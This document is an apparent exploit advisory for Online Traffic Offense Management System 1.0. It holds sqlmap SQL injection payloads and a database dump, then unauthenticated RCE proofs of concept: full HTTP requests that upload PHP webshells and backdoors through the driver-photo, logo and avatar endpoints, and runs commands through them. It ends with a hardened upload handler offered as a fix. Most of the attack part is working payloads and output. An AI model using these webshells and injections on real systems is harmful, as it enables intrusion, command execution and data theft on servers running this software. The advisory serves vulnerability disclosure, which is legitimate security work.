Parameter: MULTIPART #3* ((custom) POST)   (injected field: first offense_id[], original value 1)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: offense_id[] = 1' AND 5855=5855 AND 'broT'='broT

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: offense_id[] = 1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: offense_id[] = 1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX
name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- [...] # Dump user, used database, all databases on the server using sqlmap C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch [...] [06:06:23] [INFO] testing MySQL [06:06:23] [INFO] confirming MySQL [06:06:24] [WARNING] reflective value(s) found and filtering out [06:06:24] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.48, PHP 7.4.23 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [06:06:24] [INFO] fetching current user [06:06:24] [INFO] resumed: 'root@localhost' current user: 'root@localhost' [06:06:24] [INFO] fetching current database [06:06:24] [INFO] retrieved: 'traffic_offense_db' current database: 'traffic_offense_db' [06:06:24] [INFO] fetching database names [06:06:24] [INFO] retrieved: 'information_schema' [06:06:24] [INFO] retrieved: 'mysql' [06:06:24] [INFO] retrieved: 'performance_schema' [06:06:24] [INFO] retrieved: 'phpmyadmin' [06:06:24] [INFO] retrieved: 'test' [06:06:24] [INFO] retrieved: 'test2' [06:06:24] [INFO] retrieved: 'traffic_offense_db' available databases [7]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] test2 [*] traffic_offense_db [06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost' [*] ending @ 06:06:24 /2021-10-07/
-
Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### RCE - Remote Code Execution
# All requests can be sent by both an authenticated and a non-authenticated user
# RCE - the vulnerability can be exploited in several ways, because none of the upload handlers validates the uploaded file:
* Driver list: any file can be uploaded as the driver photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
* System information: any file can be uploaded as the system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
* User profile: any file can be uploaded as the avatar - http://localhost/traffic_offense/admin/?page=user
* Create a new user with a malicious avatar - http://localhost/traffic_offense/admin/?page=user/manage_user
* Edit another user and replace their avatar with a webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example 1
# Request sent as an unauthenticated user

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 1184
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"


-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
    system($_REQUEST['x']);
} else phpinfo();
?>
</pre>
</BODY></HTML>
-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:59:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# The file was uploaded to the uploads directory
# Request to list files in uploads\

GET /traffic_offense/uploads/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:06:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 2139
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /traffic_offense/uploads</title>
 </head>
 <body>
<h1>Index of /traffic_offense/uploads</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a> </td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a> </td><td align="right">2021-08-19 09:24 </td><td align="right"> 11K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58 </td><td align="right">5.2K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a> </td><td align="right">2021-10-07 07:31 </td><td align="right">3.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a> </td>
[...]

-----------------------------------------------------------------------------------------------------------------------
# Request to webshell

GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:10:10 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 810
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
 Volume in drive C has no label.
 Volume Serial Number is 283C-C6A0

 Directory of C:\xampp\htdocs\traffic_offense\uploads

07.10.2021  10:09    <DIR>          .
07.10.2021  10:09    <DIR>          ..
19.08.2021  09:24            11 426 1629336240_avatar.jpg
20.08.2021  08:58             5 288 1629421080_tl-logo.png
07.10.2021  07:31             3 451 1633584660_xss.svg
07.10.2021  09:59               252 1633593540_cmd.php
07.10.2021  10:02               252 1633593720_cmd.php
07.10.2021  09:02    <DIR>          drivers
               5 File(s)         20 669 bytes
               3 Dir(s)  86 494 085 120 bytes free
</pre>
</BODY></HTML>

-----------------------------------------------------------------------------------------------------------------------
## Example 2
# Webshell uploaded as the System Logo and a second webshell as the Portal Cover on the System Information page
# Request

POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
Content-Length: 3176
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=system_info
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="name"

Online Traffic Offense Management System - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="short_name"

OTOMS - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="about_us"

<p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
    system($_REQUEST['x']);
} else phpinfo();
?>
</pre>
</BODY></HTML>
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="cover"; filename="list.php"
Content-Type: application/octet-stream

<?php
if($_GET['file']) {
    $fichero=$_GET['file'];
} else {
    $fichero="/";
}
if($handle = @opendir($fichero)) {
    while($filename = readdir($handle)) {
        echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
    }
    closedir($handle);
} else {
    echo "FILE: " . $fichero . "<br><hr><pre>";
    $fp = fopen($fichero, "r");
    $buffer = fread($fp, filesize($fichero));
    echo $buffer;
    fclose($fp);
}
?>
-----------------------------339921602532596419562348365833--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:21:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# The situation is the same as in the previous variant. Two files were written to the uploads directory: 1633595040_list.php and 1633595040_cmd.php

## Example 3
# Webshell uploaded as the photo on the driver list page
# Request

POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
Content-Length: 2148
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="id"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_id_no"

vvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="lastname"

vvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="firstname"

vvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="middlename"

vvvvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="dob"

2021-10-07
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="present_address"

vvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="permanent_address"

vvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="civil_status"

Single
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="nationality"

vvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="contact"

vvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_type"

Student
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="image_path"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
Content-Type: application/octet-stream

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->
-----------------------------12210274961293066124133837204--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:35:21 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------
# Request to webshell

GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:39:15 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 95
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>desktop-uhrf0c6\hubert
</pre>
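# Added example (not code from this advisory or from the OTOMS project): a hardened replacement for the image-upload step that every endpoint above lacks. The function name store_image_upload, the constants and the destination directory are assumptions; the $_FILES['img'] field name is taken from the requests above. It must be called only after the handler has verified the session, since the advisory notes the endpoints accept unauthenticated requests.

```php
<?php
// Hypothetical hardened upload handler for the OTOMS avatar/logo/photo
// uploads (added example, not the project's own code).
declare(strict_types=1);

// Sniffed MIME type => extension assigned by the server. SVG is deliberately
// absent: it can carry script (note the xss.svg in the directory listing
// above), so it is not an acceptable avatar, logo or photo format.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;

/**
 * Validate one $_FILES entry and move it into $destDir under a name the
 * server chooses. Returns the stored file name or throws RuntimeException.
 *
 * @param array  $file    one entry of $_FILES, e.g. $_FILES['img']
 * @param string $destDir directory outside the web root, or one where the
 *                        web server is configured not to execute PHP
 */
function store_image_upload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or missing');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ((int) $file['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Sniff the bytes; never trust the client's filename or Content-Type
    // (the PoCs above send "cmd.php" as application/octet-stream).
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException('unsupported file type');
    }

    // Independent second check: the data must really decode as an image of
    // the sniffed type. A PHP file with a forged magic header fails here.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || ($info['mime'] ?? '') !== $mime) {
        throw new RuntimeException('file does not decode as an image');
    }

    // Server-chosen name with a server-chosen extension, so neither
    // "<timestamp>_cmd.php" nor "drivers/19.php" can ever be produced.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $dest = rtrim($destDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable, never executable
    return $name;
}

// Usage from a handler such as Master.php?f=save_driver (after the
// session check):
// try {
//     $stored = store_image_upload($_FILES['img'], __DIR__ . '/../uploads');
// } catch (RuntimeException $e) {
//     http_response_code(400);
//     exit(json_encode(['status' => 'failed', 'msg' => $e->getMessage()]));
// }
```

Pair this with a web-server rule that disables script execution under uploads/ and turns off directory listing; the autoindex page in Example 1 is what revealed the stored file names to the tester.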